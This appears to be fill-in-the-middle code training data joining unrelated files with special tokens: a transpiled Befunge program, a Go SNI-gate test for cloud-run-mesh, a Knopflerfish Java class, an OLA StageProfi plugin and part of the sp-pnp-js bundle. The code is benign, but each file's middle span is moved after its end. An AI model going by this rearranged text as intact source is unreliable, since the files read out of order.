(19)if(gr(2,1)>gr(3,1))else(8) def _8(): sa(1) sa((1)if(gr(6,1)>gr(3,0))else(0)) return 9 def _9(): return (18)if(sp()!=0)else(10) def _10(): gw(8,1,sr()*((((gr(2,1)*7)+gr(3,1))*5)+gr(4,1))) sa(sr()*gr(6,1)) sa(tm(sr(),gr(2,0))) v0=sp() v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() sa(gr(sp(),v0)) sa(sr()); return (13)if(sp()!=0)else(11) def _11(): sp(); sa(sr()*gr(6,1)) sa(gr(8,1)) v0=sp() v1=sp() sa(v0) sa(v1) sa(tm(sr(),gr(2,0))) v0=sp() v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() v1=sp() gw(v1,v0,sp()) gw(6,0,gr(6,0)+1) return 12 def _12(): sa(sp()+1) sa((1)if((sr()*gr(6,1))>gr(3,0))else(0)) return 9 def _13(): return (17)if((sr()-gr(8,1))!=0)else(14) def _14(): sp(); sa(1) return 15 def _15(): return (12)if(sp()!=0)else(16) def _16(): sa(sr()*gr(6,1)) sa(-1) v0=sp() v1=sp() sa(v0) sa(v1) sa(tm(sr(),gr(2,0))) v0=sp() v1=sp() sa(v0) sa(v1) sa(td(sp(),gr(2,0))) sa(sp()+3) v0=sp() v1=sp() gw(v1,v0,sp()) gw(6,0,gr(6,0)-1) return 12 def _17(): sa((1)if(sp()<0)else(0)) return 15 def _18(): sp(); sa((gr(9,0)+1)*(gr(9,0)+1)*2) sa(gr(9,0)+1) gw(9,0,gr(9,0)+1) return 6 def _19(): global t0 t0=gr(2,1) gw(2,1,gr(3,1)) gw(3,1,t0) return 8 def _20(): gw(8,0,gr(8,0)+1) return 4 def _21(): sys.stdout.write(str(gr(6,0))+" ") sys.stdout.flush() return 22 m=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21] c=0 while c<22: c=m[c]()<|fim▁end|>
sa(v0) sa(v1) sa(tm(sr(),gr(2,0))) v0=sp()
<|file_name|>snigate_test.go<|end_file_name|><|fim▁begin|>// Copyright 2021 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // https://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package meshconnectord import ( "context" "io" "io/ioutil" "log" "os" "testing" "time" "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/gcp" _ "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/gcp" "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/hbone" "github.com/GoogleCloudPlatform/cloud-run-mesh/pkg/mesh" ) // TestSNIGate is e2e, requires a k8s connection (kube config is fine) // Also requires certificates to be created - will not start agent or envoy func TestSNIGate(t *testing.T) {<|fim▁hole|> gateK8S.XDSAddr = "-" // prevent pilot-agent from starting gateK8S.BaseDir = "../../" ctx := context.Background() gcp.InitGCP(ctx, gateK8S) gate := New(gateK8S) err := gate.InitSNIGate(context.Background(), ":0", ":0") if err != nil { t.Skip("Failed to connect to start gate ", time.Since(gateK8S.StartTime), gateK8S, os.Environ(), err) } t.Log("Gate listening on ", gate.SNIListener.Addr()) t.Run("client", func(t *testing.T) { aliceMesh := mesh.New() aliceMesh.XDSAddr = "-" // prevent pilot-agent from starting aliceMesh.BaseDir = "../../" ctx, cf := context.WithTimeout(context.Background(), 5*time.Second) defer cf() err := aliceMesh.LoadConfig(ctx) if err != nil { t.Skip("Skipping test, no k8s environment") } alice := hbone.New() addr := aliceMesh.MeshConnectorAddr if addr == "" { t.Skip("Missing gate") } // TODO: use the full URL of CR, and a magic port ? // Disabled temp - would only work in cluster, needs access to the internal // address. // WIP: deploy an in-cluster test app that can be used to trigger this or port forward t.Run("sni-to-test", func(t *testing.T) { if !aliceMesh.InCluster { t.Skip("Only in-cluster") } aliceToFortio := alice.NewClient() // Create an endpoint for the gate. ep := aliceToFortio.NewEndpoint("https://" + addr + ":15443/_hbone/tcp") ep.SNI = "outbound_.8080_._.default.default.svc.cluster.local" rin, lout := io.Pipe() lin, rout := io.Pipe() err = ep.Proxy(context.Background(), rin, rout) if err != nil { t.Fatal(err) } lout.Write([]byte("GET / HTTP/1.1\n\n")) d, err := ioutil.ReadAll(lin) log.Println(d, err) }) // TODO: connect, verify tokens }) } // Manual testing, using the gate on localhost and the e2e test service: // /usr/bin/curl -v https://fortio-istio-icq63pqnqq-uc.fortio.svc.cluster.local:15443/fortio/ --resolve fortio-istio-icq63pqnqq-uc.fortio.svc.cluster.local:15443:127.0.0.1 --key var/run/secrets/istio.io/key.pem --cert var/run/secrets/istio.io/cert-chain.pem --cacert var/run/secrets/istio.io/root-cert.pem // SUFFIX=-istio make -f samples/fortio/Makefile logs |less<|fim▁end|>
gateK8S := mesh.New()
<|file_name|>RepositoryInfo.java<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2013-2013, KNOPFLERFISH project * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following * conditions are met: * * - Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * - Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following * disclaimer in the documentation and/or other materials * provided with the distribution. * * - Neither the name of the KNOPFLERFISH project nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.knopflerfish.service.repositorymanager; import org.osgi.framework.Constants; import org.osgi.framework.ServiceReference; import org.osgi.service.repository.Repository; public class RepositoryInfo implements Comparable<RepositoryInfo> { final private long id; final private int rank; final ServiceReference<Repository> sr; public RepositoryInfo(ServiceReference<Repository> sr) { this.id = ((Long)sr.getProperty(Constants.SERVICE_ID)).longValue(); Object r = sr.getProperty(Constants.SERVICE_RANKING); if (r != null && r instanceof Integer) { this.rank = ((Integer)r).intValue(); } else { this.rank = 0; } this.sr = sr; } public RepositoryInfo(RepositoryInfo old, int rank) { this.id = old.id; this.rank = rank; this.sr = old.sr; } public long getId() { return id; } public int getRank() { return rank; } public Object getProperty(String prop) { return sr.getProperty(prop); } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * result + (int) (id ^ (id >>> 32)); return result; } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null) return false; if (getClass() != o.getClass()) return false; RepositoryInfo rio = (RepositoryInfo) o; if (id != rio.id || rank != rio.rank) return false; return true; } @Override public int compareTo(RepositoryInfo o) { if (equals(o)) { return 0; } if (rank != o.rank) { return o.rank - rank; } else { return id < o.id ? -1 : 1; } } public ServiceReference<Repository> getServiceReference() { return sr; } @Override public String toString() { return "RepositoryInfo [id=" + id + ", rank=" + rank + "]";<|fim▁hole|><|fim▁end|>
} }
<|file_name|>StageProfiPlugin.cpp<|end_file_name|><|fim▁begin|>/* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Library General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * StageProfiPlugin.cpp * The StageProfi plugin for ola * Copyright (C) 2006-2008 Simon Newton */ #include <stdlib.h> #include <stdio.h> #include <string> #include <vector> #include "ola/Logging.h" #include "olad/PluginAdaptor.h" #include "olad/Preferences.h" #include "plugins/stageprofi/StageProfiDevice.h" #include "plugins/stageprofi/StageProfiPlugin.h" /* * Entry point to this plugin */ extern "C" ola::AbstractPlugin* create( const ola::PluginAdaptor *plugin_adaptor) { return new ola::plugin::stageprofi::StageProfiPlugin(plugin_adaptor); } namespace ola { namespace plugin { namespace stageprofi { using std::string; const char StageProfiPlugin::STAGEPROFI_DEVICE_PATH[] = "/dev/ttyUSB0"; const char StageProfiPlugin::STAGEPROFI_DEVICE_NAME[] = "StageProfi Device"; const char StageProfiPlugin::PLUGIN_NAME[] = "StageProfi"; const char StageProfiPlugin::PLUGIN_PREFIX[] = "stageprofi"; const char StageProfiPlugin::DEVICE_KEY[] = "device"; /* * Start the plugin * * Multiple devices now supported */ bool StageProfiPlugin::StartHook() { vector<string> device_names; vector<string>::iterator it; StageProfiDevice *device; // fetch device listing device_names = m_preferences->GetMultipleValue(DEVICE_KEY); for (it = device_names.begin(); it != device_names.end(); ++it) { if (it->empty()) continue; device = new StageProfiDevice(this, STAGEPROFI_DEVICE_NAME, *it); if (!device->Start()) { delete device; continue; } m_plugin_adaptor->AddSocket(device->GetSocket()); m_plugin_adaptor->RegisterDevice(device); m_devices.insert(m_devices.end(), device); } return true; } /* * Stop the plugin * @return true on success, false on failure */ bool StageProfiPlugin::StopHook() { vector<StageProfiDevice*>::iterator iter; for (iter = m_devices.begin(); iter != m_devices.end(); ++iter) { m_plugin_adaptor->RemoveSocket((*iter)->GetSocket()); DeleteDevice(*iter); } m_devices.clear(); return true; } /* * Return the description for this plugin */ string StageProfiPlugin::Description() const { return "StageProfi Plugin\n" "----------------------------\n" "\n" "This plugin creates devices with one output port.\n" "\n" "--- Config file : ola-stageprofi.conf ---\n" "\n" "device = /dev/ttyUSB0\n" "device = 192.168.1.250\n" "The device to use either as a path for the USB version or an IP address\n" "for the LAN version. Multiple devices are supported.\n"; } /* * Called when the file descriptor is closed. */ int StageProfiPlugin::SocketClosed(ConnectedSocket *socket) { vector<StageProfiDevice*>::iterator iter; for (iter = m_devices.begin(); iter != m_devices.end(); ++iter) { if ((*iter)->GetSocket() == socket) break; } if (iter == m_devices.end()) { OLA_WARN << "unknown fd"; return -1; } DeleteDevice(*iter); m_devices.erase(iter); return 0; } /* * load the plugin prefs and default to sensible values * */ bool StageProfiPlugin::SetDefaultPreferences() {<|fim▁hole|> if (!m_preferences) return false; bool save = false; save |= m_preferences->SetDefaultValue(DEVICE_KEY, StringValidator(), STAGEPROFI_DEVICE_PATH); if (save) m_preferences->Save(); if (m_preferences->GetValue(DEVICE_KEY).empty()) return false; return true; } /* * Cleanup a single device */ void StageProfiPlugin::DeleteDevice(StageProfiDevice *device) { m_plugin_adaptor->UnregisterDevice(device); device->Stop(); delete device; } } // stageprofi } // plugin } // ola<|fim▁end|>
<|file_name|>pnp.js<|end_file_name|><|fim▁begin|>/** * sp-pnp-js v2.0.6-beta.1 - A JavaScript library for SharePoint development. * MIT (https://github.com/SharePoint/PnP-JS-Core/blob/master/LICENSE) * Copyright (c) 2017 Microsoft * docs: http://officedev.github.io/PnP-JS-Core * source: https://github.com/SharePoint/PnP-JS-Core * bugs: https://github.com/SharePoint/PnP-JS-Core/issues */ (function webpackUniversalModuleDefinition(root, factory) { if(typeof exports === 'object' && typeof module === 'object') module.exports = factory(); else if(typeof define === 'function' && define.amd) define([], factory); else if(typeof exports === 'object') exports["$pnp"] = factory(); else root["$pnp"] = factory(); })(this, function() { return /******/ (function(modules) { // webpackBootstrap /******/ // The module cache /******/ var installedModules = {}; /******/ /******/ // The require function /******/ function __webpack_require__(moduleId) { /******/ /******/ // Check if module is in cache /******/ if(installedModules[moduleId]) /******/ return installedModules[moduleId].exports; /******/ /******/ // Create a new module (and put it into the cache) /******/ var module = installedModules[moduleId] = { /******/ i: moduleId, /******/ l: false, /******/ exports: {} /******/ }; /******/ /******/ // Execute the module function /******/ modules[moduleId].call(module.exports, module, module.exports, __webpack_require__); /******/ /******/ // Flag the module as loaded /******/ module.l = true; /******/ /******/ // Return the exports of the module /******/ return module.exports; /******/ } /******/ /******/ /******/ // expose the modules object (__webpack_modules__) /******/ __webpack_require__.m = modules; /******/ /******/ // expose the module cache /******/ __webpack_require__.c = installedModules; /******/ /******/ // identity function for calling harmony imports with the correct context /******/ __webpack_require__.i = function(value) { return value; }; /******/ /******/ // define getter function for harmony exports /******/ __webpack_require__.d = function(exports, name, getter) { /******/ if(!__webpack_require__.o(exports, name)) { /******/ Object.defineProperty(exports, name, { /******/ configurable: false, /******/ enumerable: true, /******/ get: getter /******/ }); /******/ } /******/ }; /******/ /******/ // getDefaultExport function for compatibility with non-harmony modules /******/ __webpack_require__.n = function(module) { /******/ var getter = module && module.__esModule ? /******/ function getDefault() { return module['default']; } : /******/ function getModuleExports() { return module; }; /******/ __webpack_require__.d(getter, 'a', getter); /******/ return getter; /******/ }; /******/ /******/ // Object.prototype.hasOwnProperty.call /******/ __webpack_require__.o = function(object, property) { return Object.prototype.hasOwnProperty.call(object, property); }; /******/ /******/ // __webpack_public_path__ /******/ __webpack_require__.p = "/assets/"; /******/ /******/ // Load entry module and return exports /******/ return __webpack_require__(__webpack_require__.s = 41); /******/ }) /************************************************************************/ /******/ ([ /* 0 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; /* WEBPACK VAR INJECTION */(function(global) { Object.defineProperty(exports, "__esModule", { value: true }); var pnplibconfig_1 = __webpack_require__(4); var Util = (function () { function Util() { } /** * Gets a callback function which will maintain context across async calls. * Allows for the calling pattern getCtxCallback(thisobj, method, methodarg1, methodarg2, ...) * * @param context The object that will be the 'this' value in the callback * @param method The method to which we will apply the context and parameters * @param params Optional, additional arguments to supply to the wrapped method when it is invoked */ Util.getCtxCallback = function (context, method) { var params = []; for (var _i = 2; _i < arguments.length; _i++) { params[_i - 2] = arguments[_i]; } return function () { method.apply(context, params); }; }; /** * Tests if a url param exists * * @param name The name of the url paramter to check */ Util.urlParamExists = function (name) { name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]"); var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"); return regex.test(location.search); }; /** * Gets a url param value by name * * @param name The name of the paramter for which we want the value */ Util.getUrlParamByName = function (name) { name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]"); var regex = new RegExp("[\\?&]" + name + "=([^&#]*)"); var results = regex.exec(location.search); return results == null ? "" : decodeURIComponent(results[1].replace(/\+/g, " ")); }; /** * Gets a url param by name and attempts to parse a bool value * * @param name The name of the paramter for which we want the boolean value */ Util.getUrlParamBoolByName = function (name) { var p = this.getUrlParamByName(name); var isFalse = (p === "" || /false|0/i.test(p)); return !isFalse; }; /** * Inserts the string s into the string target as the index specified by index * * @param target The string into which we will insert s * @param index The location in target to insert s (zero based) * @param s The string to insert into target at position index */ Util.stringInsert = function (target, index, s) { if (index > 0) { return target.substring(0, index) + s + target.substring(index, target.length); } return s + target; }; /** * Adds a value to a date * * @param date The date to which we will add units, done in local time * @param interval The name of the interval to add, one of: ['year', 'quarter', 'month', 'week', 'day', 'hour', 'minute', 'second'] * @param units The amount to add to date of the given interval * * http://stackoverflow.com/questions/1197928/how-to-add-30-minutes-to-a-javascript-date-object */ Util.dateAdd = function (date, interval, units) { var ret = new Date(date.toLocaleString()); // don't change original date switch (interval.toLowerCase()) { case "year": ret.setFullYear(ret.getFullYear() + units); break; case "quarter": ret.setMonth(ret.getMonth() + 3 * units); break; case "month": ret.setMonth(ret.getMonth() + units); break; case "week": ret.setDate(ret.getDate() + 7 * units); break; case "day": ret.setDate(ret.getDate() + units); break; case "hour": ret.setTime(ret.getTime() + units * 3600000); break; case "minute": ret.setTime(ret.getTime() + units * 60000); break; case "second": ret.setTime(ret.getTime() + units * 1000); break; default: ret = undefined; break; } return ret; }; /** * Loads a stylesheet into the current page * * @param path The url to the stylesheet * @param avoidCache If true a value will be appended as a query string to avoid browser caching issues */ Util.loadStylesheet = function (path, avoidCache) { if (avoidCache) { path += "?" + encodeURIComponent((new Date()).getTime().toString()); } var head = document.getElementsByTagName("head"); if (head.length > 0) { var e = document.createElement("link"); head[0].appendChild(e); e.setAttribute("type", "text/css"); e.setAttribute("rel", "stylesheet"); e.setAttribute("href", path); } }; /** * Combines an arbitrary set of paths ensuring that the slashes are normalized * * @param paths 0 to n path parts to combine */ Util.combinePaths = function () { var paths = []; for (var _i = 0; _i < arguments.length; _i++) { paths[_i] = arguments[_i]; } return paths .filter(function (path) { return !Util.stringIsNullOrEmpty(path); }) .map(function (path) { return path.replace(/^[\\|\/]/, "").replace(/[\\|\/]$/, ""); }) .join("/") .replace(/\\/g, "/"); }; /** * Gets a random string of chars length * * @param chars The length of the random string to generate */ Util.getRandomString = function (chars) { var text = new Array(chars); var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; for (var i = 0; i < chars; i++) { text[i] = possible.charAt(Math.floor(Math.random() * possible.length)); } return text.join(""); }; /** * Gets a random GUID value * * http://stackoverflow.com/questions/105034/create-guid-uuid-in-javascript */ /* tslint:disable no-bitwise */ Util.getGUID = function () { var d = new Date().getTime(); var guid = "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g, function (c) { var r = (d + Math.random() * 16) % 16 | 0; d = Math.floor(d / 16); return (c === "x" ? r : (r & 0x3 | 0x8)).toString(16); }); return guid; }; /* tslint:enable */ /** * Determines if a given value is a function * * @param candidateFunction The thing to test for being a function */ Util.isFunction = function (candidateFunction) { return typeof candidateFunction === "function"; }; /** * @returns whether the provided parameter is a JavaScript Array or not. */ Util.isArray = function (array) { if (Array.isArray) { return Array.isArray(array); } return array && typeof array.length === "number" && array.constructor === Array; }; /** * Determines if a string is null or empty or undefined * * @param s The string to test */ Util.stringIsNullOrEmpty = function (s) { return typeof s === "undefined" || s === null || s.length < 1; }; /** * Provides functionality to extend the given object by doing a shallow copy * * @param target The object to which properties will be copied * @param source The source object from which properties will be copied * @param noOverwrite If true existing properties on the target are not overwritten from the source * */ Util.extend = function (target, source, noOverwrite) { if (noOverwrite === void 0) { noOverwrite = false; } if (source === null || typeof source === "undefined") { return target; } // ensure we don't overwrite things we don't want overwritten var check = noOverwrite ? function (o, i) { return !(i in o); } : function () { return true; }; return Object.getOwnPropertyNames(source) .filter(function (v) { return check(target, v); }) .reduce(function (t, v) { t[v] = source[v]; return t; }, target); }; /** * Determines if a given url is absolute * * @param url The url to check to see if it is absolute */ Util.isUrlAbsolute = function (url) { return /^https?:\/\/|^\/\//i.test(url); }; /** * Ensures that a given url is absolute for the current web based on context * * @param candidateUrl The url to make absolute * */ Util.toAbsoluteUrl = function (candidateUrl) { return new Promise(function (resolve) { if (Util.isUrlAbsolute(candidateUrl)) { // if we are already absolute, then just return the url return resolve(candidateUrl); } if (pnplibconfig_1.RuntimeConfig.baseUrl !== null) { // base url specified either with baseUrl of spfxContext config property return resolve(Util.combinePaths(pnplibconfig_1.RuntimeConfig.baseUrl, candidateUrl)); } if (typeof global._spPageContextInfo !== "undefined") { // operating in classic pages if (global._spPageContextInfo.hasOwnProperty("webAbsoluteUrl")) { return resolve(Util.combinePaths(global._spPageContextInfo.webAbsoluteUrl, candidateUrl)); } else if (global._spPageContextInfo.hasOwnProperty("webServerRelativeUrl")) { return resolve(Util.combinePaths(global._spPageContextInfo.webServerRelativeUrl, candidateUrl)); } } // does window.location exist and have _layouts in it? if (typeof global.location !== "undefined") { var index = global.location.toString().toLowerCase().indexOf("/_layouts/"); if (index > 0) { // we are likely in the workbench in /_layouts/ return resolve(Util.combinePaths(global.location.toString().substr(0, index), candidateUrl)); } } return resolve(candidateUrl); }); }; return Util; }()); exports.Util = Util; /* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(32))) /***/ }), /* 1 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var collections_1 = __webpack_require__(6); var odata_1 = __webpack_require__(2); var pnplibconfig_1 = __webpack_require__(4); var exceptions_1 = __webpack_require__(3); var logging_1 = __webpack_require__(5); var pipeline_1 = __webpack_require__(45); /** * Queryable Base Class * */ var Queryable = (function () { /** * Creates a new instance of the Queryable class * * @constructor * @param baseUrl A string or Queryable that should form the base part of the url * */ function Queryable(baseUrl, path) { this._query = new collections_1.Dictionary(); this._batch = null; if (typeof baseUrl === "string") { // we need to do some extra parsing to get the parent url correct if we are // being created from just a string. var urlStr = baseUrl; if (util_1.Util.isUrlAbsolute(urlStr) || urlStr.lastIndexOf("/") < 0) { this._parentUrl = urlStr; this._url = util_1.Util.combinePaths(urlStr, path); } else if (urlStr.lastIndexOf("/") > urlStr.lastIndexOf("(")) { // .../items(19)/fields var index = urlStr.lastIndexOf("/"); this._parentUrl = urlStr.slice(0, index); path = util_1.Util.combinePaths(urlStr.slice(index), path); this._url = util_1.Util.combinePaths(this._parentUrl, path); } else { // .../items(19) var index = urlStr.lastIndexOf("("); this._parentUrl = urlStr.slice(0, index); this._url = util_1.Util.combinePaths(urlStr, path); } } else { var q = baseUrl; this._parentUrl = q._url; var target = q._query.get("@target"); if (target !== null) { this._query.add("@target", target); } this._url = util_1.Util.combinePaths(this._parentUrl, path); } } /** * Directly concatonates the supplied string to the current url, not normalizing "/" chars * * @param pathPart The string to concatonate to the url */ Queryable.prototype.concat = function (pathPart) { this._url += pathPart; return this; }; /** * Appends the given string and normalizes "/" chars * * @param pathPart The string to append */ Queryable.prototype.append = function (pathPart) { this._url = util_1.Util.combinePaths(this._url, pathPart); }; /** * Blocks a batch call from occuring, MUST be cleared by calling the returned function */ Queryable.prototype.addBatchDependency = function () { if (this.hasBatch) { return this._batch.addDependency(); } return function () { return null; }; }; Object.defineProperty(Queryable.prototype, "hasBatch", { /** * Indicates if the current query has a batch associated * */ get: function () { return this._batch !== null; }, enumerable: true, configurable: true }); Object.defineProperty(Queryable.prototype, "batch", { /** * The batch currently associated with this query or null * */ get: function () { return this.hasBatch ? this._batch : null; }, enumerable: true, configurable: true }); Object.defineProperty(Queryable.prototype, "parentUrl", { /** * Gets the parent url used when creating this instance * */ get: function () { return this._parentUrl; }, enumerable: true, configurable: true }); Object.defineProperty(Queryable.prototype, "query", { /** * Provides access to the query builder for this url * */ get: function () { return this._query; }, enumerable: true, configurable: true }); /** * Creates a new instance of the supplied factory and extends this into that new instance * * @param factory constructor for the new queryable */ Queryable.prototype.as = function (factory) { var o = new factory(this._url, null); return util_1.Util.extend(o, this, true); }; /** * Adds this query to the supplied batch * * @example * ``` * * let b = pnp.sp.createBatch(); * pnp.sp.web.inBatch(b).get().then(...); * b.execute().then(...) * ``` */ Queryable.prototype.inBatch = function (batch) { if (this._batch !== null) { throw new exceptions_1.AlreadyInBatchException(); } this._batch = batch; return this; }; /** * Enables caching for this request * * @param options Defines the options used when caching this request */ Queryable.prototype.usingCaching = function (options) { if (!pnplibconfig_1.RuntimeConfig.globalCacheDisable) { this._useCaching = true; this._cachingOptions = options; } return this; }; /** * Gets the currentl url, made absolute based on the availability of the _spPageContextInfo object * */ Queryable.prototype.toUrl = function () { return this._url; }; /** * Gets the full url with query information * */ Queryable.prototype.toUrlAndQuery = function () { var aliasedParams = new collections_1.Dictionary(); var url = this.toUrl().replace(/'!(@.*?)::(.*?)'/ig, function (match, labelName, value) { logging_1.Logger.write("Rewriting aliased parameter from match " + match + " to label: " + labelName + " value: " + value, logging_1.LogLevel.Verbose); aliasedParams.add(labelName, "'" + value + "'"); return labelName; }); // inlude our explicitly set query string params aliasedParams.merge(this._query); if (aliasedParams.count() > 0) { url += "?" + aliasedParams.getKeys().map(function (key) { return key + "=" + aliasedParams.get(key); }).join("&"); } return url; }; /** * Gets a parent for this instance as specified * * @param factory The contructor for the class to create */ Queryable.prototype.getParent = function (factory, baseUrl, path, batch) { if (baseUrl === void 0) { baseUrl = this.parentUrl; } var parent = new factory(baseUrl, path); var target = this.query.get("@target"); if (target !== null) { parent.query.add("@target", target); } if (typeof batch !== "undefined") { parent = parent.inBatch(batch); } return parent; }; /** * Clones this queryable into a new queryable instance of T * @param factory Constructor used to create the new instance * @param additionalPath Any additional path to include in the clone * @param includeBatch If true this instance's batch will be added to the cloned instance */ Queryable.prototype.clone = function (factory, additionalPath, includeBatch) { if (includeBatch === void 0) { includeBatch = false; } var clone = new factory(this, additionalPath); var target = this.query.get("@target"); if (target !== null) { clone.query.add("@target", target); } if (includeBatch && this.hasBatch) { clone = clone.inBatch(this.batch); } return clone; }; /** * Executes the currently built request * * @param parser Allows you to specify a parser to handle the result * @param getOptions The options used for this request */ Queryable.prototype.get = function (parser, getOptions) { if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } if (getOptions === void 0) { getOptions = {}; } return this.toRequestContext("GET", getOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.getAs = function (parser, getOptions) { if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } if (getOptions === void 0) { getOptions = {}; } return this.toRequestContext("GET", getOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.post = function (postOptions, parser) { if (postOptions === void 0) { postOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("POST", postOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.postAs = function (postOptions, parser) { if (postOptions === void 0) { postOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("POST", postOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.patch = function (patchOptions, parser) { if (patchOptions === void 0) { patchOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("PATCH", patchOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.delete = function (deleteOptions, parser) { if (deleteOptions === void 0) { deleteOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("DELETE", deleteOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; /** * Converts the current instance to a request context * * @param verb The request verb * @param options The set of supplied request options * @param parser The supplied ODataParser instance * @param pipeline Optional request processing pipeline */ Queryable.prototype.toRequestContext = function (verb, options, parser, pipeline) { var _this = this; if (options === void 0) { options = {}; } if (pipeline === void 0) { pipeline = pipeline_1.PipelineMethods.default; } var dependencyDispose = this.hasBatch ? this.addBatchDependency() : function () { return; }; return util_1.Util.toAbsoluteUrl(this.toUrlAndQuery()).then(function (url) { // build our request context var context = { batch: _this._batch, batchDependency: dependencyDispose, cachingOptions: _this._cachingOptions, isBatched: _this.hasBatch, isCached: _this._useCaching, options: options, parser: parser, pipeline: pipeline, requestAbsoluteUrl: url, requestId: util_1.Util.getGUID(), verb: verb, }; return context; }); }; return Queryable; }()); exports.Queryable = Queryable; /** * Represents a REST collection which can be filtered, paged, and selected * */ var QueryableCollection = (function (_super) { __extends(QueryableCollection, _super); function QueryableCollection() { return _super !== null && _super.apply(this, arguments) || this; } /** * Filters the returned collection (https://msdn.microsoft.com/en-us/library/office/fp142385.aspx#bk_supported) * * @param filter The string representing the filter query */ QueryableCollection.prototype.filter = function (filter) { this._query.add("$filter", filter); return this; }; /** * Choose which fields to return * * @param selects One or more fields to return */ QueryableCollection.prototype.select = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } if (selects.length > 0) { this._query.add("$select", selects.join(",")); } return this; }; /** * Expands fields such as lookups to get additional data * * @param expands The Fields for which to expand the values */ QueryableCollection.prototype.expand = function () { var expands = []; for (var _i = 0; _i < arguments.length; _i++) { expands[_i] = arguments[_i]; } if (expands.length > 0) { this._query.add("$expand", expands.join(",")); } return this; }; /** * Orders based on the supplied fields ascending * * @param orderby The name of the field to sort on * @param ascending If false DESC is appended, otherwise ASC (default) */ QueryableCollection.prototype.orderBy = function (orderBy, ascending) { if (ascending === void 0) { ascending = true; } var keys = this._query.getKeys(); var query = []; var asc = ascending ? " asc" : " desc"; for (var i = 0; i < keys.length; i++) { if (keys[i] === "$orderby") { query.push(this._query.get("$orderby")); break; } } query.push("" + orderBy + asc); this._query.add("$orderby", query.join(",")); return this; }; /** * Skips the specified number of items * * @param skip The number of items to skip */ QueryableCollection.prototype.skip = function (skip) { this._query.add("$skip", skip.toString()); return this; }; /** * Limits the query to only return the specified number of items * * @param top The query row limit */ QueryableCollection.prototype.top = function (top) { this._query.add("$top", top.toString()); return this; }; return QueryableCollection; }(Queryable)); 